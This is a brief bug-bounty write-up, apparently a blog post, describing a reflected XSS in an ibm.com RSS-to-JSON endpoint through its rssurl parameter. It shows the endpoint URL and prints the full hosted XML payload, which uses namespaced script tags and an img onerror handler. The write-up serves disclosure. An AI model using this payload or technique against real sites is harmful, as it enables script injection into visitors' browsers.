hi :D
this my write up about my bug I've found on ibm.com, first I get URLs from web.archive.org on ibm.com by using waybackurls tool and I got this URL https://www-356.ibm.com/partnerworld/wps/servlet/pwdyn/pw/rss/rsstojson.jsp?ccdb=no&rssurl=https://www-2000.ibm.com/file.xml&_=1596170198353
this endpoint include XML file via rssurl parameter and covert the content from XML to jsonp
but in headers, content-type: text/html, this allowed to execute HTML tags in this page , so I've created an XML file with XSS payload and upload it on my website https://knassar702.github.io/xss.xml
and add the link of the file in rssurl parameter
<html> <head></head> <body> <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script> <info> <name> <value><![CDATA[<img src=x onerror=confirm(document.domain)>]]></value> </name> <description> <value>Hello</value> </description> <url> <value>http://google.com</value> </url> </info> </body> </html> 
Done :D
Top comments (0)